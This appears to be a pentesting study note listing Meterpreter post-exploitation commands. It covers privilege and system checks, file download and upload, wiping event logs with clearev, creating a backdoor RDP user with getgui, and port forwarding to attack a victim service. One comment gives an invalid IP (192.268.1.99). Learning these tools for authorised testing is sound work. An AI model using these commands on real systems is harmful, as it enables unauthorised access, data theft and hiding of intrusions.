Skip to main content

meterpreter

help # shows help
background # puts the current session in background, we can inspect them with
# the sesssions command

Once we get onto a machine we generally perform these actions

getuid # what privilege do we have on the remote machine
sysinfo # provides info on the target system
ps # shows the list of active processes on the target machine
shell # drops to a system shell

Once on a system shell, we can go back to our meterpreter session by issuing:

exit

We can manage (e.g., download/upload) files with:

download filename
upload filename
search filename # searches on the filesystem

From the meterpreter session we can do:

load <module> # we can press tab to check available modules

We can also run specific script generally used in the post-exploitation phase, such as:

run # double tab to list all options
run post/linux/gather/checkvm # which checks if the taret machine is a VM

Notice that these post exploitation tools can also be run outside meterpreter if we background the session by setting as option to the script the session id.

We can also clear all the event log by doing:

clearev

Another cool option is to enable RDP on a compromised machine and create a new user, this can be done by typing:

run getgui -u (UID) -p (PASSWD)

Meterpreter Port Forwarding

We can perform port forwarding in metasploit as with SSH tunnels, for example let's say that there is a service available on an attacked machine, we can forward it on our localhost on a custom port, this can be done by doing:

portfwd add -l 1234 -p 25 -r 192.168.1.99
# this will use our port 1234 as a mirror for port 25 on victim ip target
# 192.268.1.99
# notice that now we may run exploits on our localhost e.g.,:
# ./super_remote_mail_exploit --target 127.0.0.1:1234
# this will attack victim's port 25